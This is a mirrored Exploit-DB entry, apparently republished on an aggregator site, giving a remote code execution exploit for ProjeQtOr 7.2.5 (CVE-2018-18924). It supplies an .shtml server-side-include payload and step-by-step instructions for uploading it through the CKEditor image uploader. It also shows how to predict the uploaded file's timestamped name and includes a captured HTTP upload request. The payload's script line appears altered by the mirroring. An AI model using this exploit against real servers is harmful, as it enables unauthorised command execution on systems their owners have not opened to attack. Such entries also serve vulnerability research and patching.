ProjeQtOr Project Management Tool 7.2.5 – Remote Code Execution

• Exploit Database
• 56 阅读

• 作者： AkkuS
  日期： 2018-10-25
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/45680/

• # Exploit Title: ProjeQtOr Project Management Tool 7.2.5 - Remote Code Execution
  # Date: 2018-10-22
  # Exploit Author: Özkan Mustafa Akkuş (AkkuS)
  # Contact: https://pentest.com.tr
  # Vendor Homepage: https://www.projeqtor.org
  # Software Link: https://sourceforge.net/projects/projectorria/files/projeqtorV7.2.5.zip/download
  # Version: v7.2.5
  # Category: Webapps
  # Tested on: XAMPP for Linux 7.2.8-0
  # CVE: CVE-2018-18924
  # Description : ProjeQtOr PMT 7.2.5 and lower versions allows to upload arbitrary "shtml" files which
  # leads to a remote command execution on the remote server.
  
  # 1) Create a file with the below HTML code and save it as .shtml
  
  <html>
  <script>
  function fex()
  {
  document.location.href="https://www.exploit-db.com/exploits/45680/<!--#echo var=DOCUMENT_NAME
  -->?"+document.getElementById('komut').value;
  }
  </script>
  <!--#exec cmd=$output -->
  </html>
  
  # 2) Login to ProjeQtOr portal as priviliage user
  # 3) You can perform this operation in the ckeditor fields.
  # 4) Click (Image) button on Content panel.
  # 5) Chose Upload section and browse your .shtml file.
  # 6) Click "Send it to Server". Script will give you "This file is not a valid image." error.
  # But it will send the file to the server. Just we need to find the file.
  # 7) We can read how the uploaded files are named in the
  # "/tool/uploadImage.php" file.(line 90)
  
  <?php
  $fileName=date('YmdHis').'_'.getSessionUser()->id.'_'.$uploadedFile['name'];
  ?>
  
  # 8) The name of our file should be;
  
  Y = Years, numeric, at least 2 digits with leading 0
  m = Months, numeric
  d = Days, numeric
  H = Hours, numeric, at least 2 digits with leading 0
  i = Minutes, numeric
  s = Seconds, numeric
  
  # We must save the date and time of the upload moment.
  
  Formula : Y+m+d+H+i+s+_+UserID+_+filename = uploaded file name
  
  # For Example; If you uploaded a file called "RCE.shtml" on 2018.10.23 at 01:02:30
  # the file name will be "20181023010230_1_RCE.shtml"
  
  # 9) Finaly all uploaded images are sent under the "/files/images/" folder.
  # 10) Verift the exploit: http://domain/files/images/20181023010230_1_RCE.shtml?whoami
  
  The request:
  
  POST
  /tool/uploadImage.php?CKEditor=result&CKEditorFuncNum=80&langCode=en
  HTTP/1.1
  Host: localhost
  User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101
  Firefox/45.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  Referer: http://localhost/view/main.php
  Cookie: projeqtor=cd3d5cf676e8598e742925cfd2343696;
  ckCsrfToken=7o1qC0Wtz7Z5QjiZ8cFuzc6yjnWdLjiHMeTalZ6n;
  PHPSESSID=bc0a9f0a918ccf0deae6de127d9b73e0
  Connection: keep-alive
  Content-Type: multipart/form-data;
  boundary=---------------------------1783728277808111921873701375
  Content-Length: 550
  -----------------------------1783728277808111921873701375
  Content-Disposition: form-data; name="upload"; filename="RCE.shtml"
  Content-Type: text/html
  
  [shtml file content]
  -----------------------------1783728277808111921873701375
  Content-Disposition: form-data; name="ckCsrfToken"
  
  7o1qC0Wtz7Z5QjiZ8cFuzc6yjnWdLjiHMeTalZ6n
  -----------------------------1783728277808111921873701375--
  
  HTTP/1.1 200 OK
  Date: Mon, 23 Oct 2018 01:02:30 GMT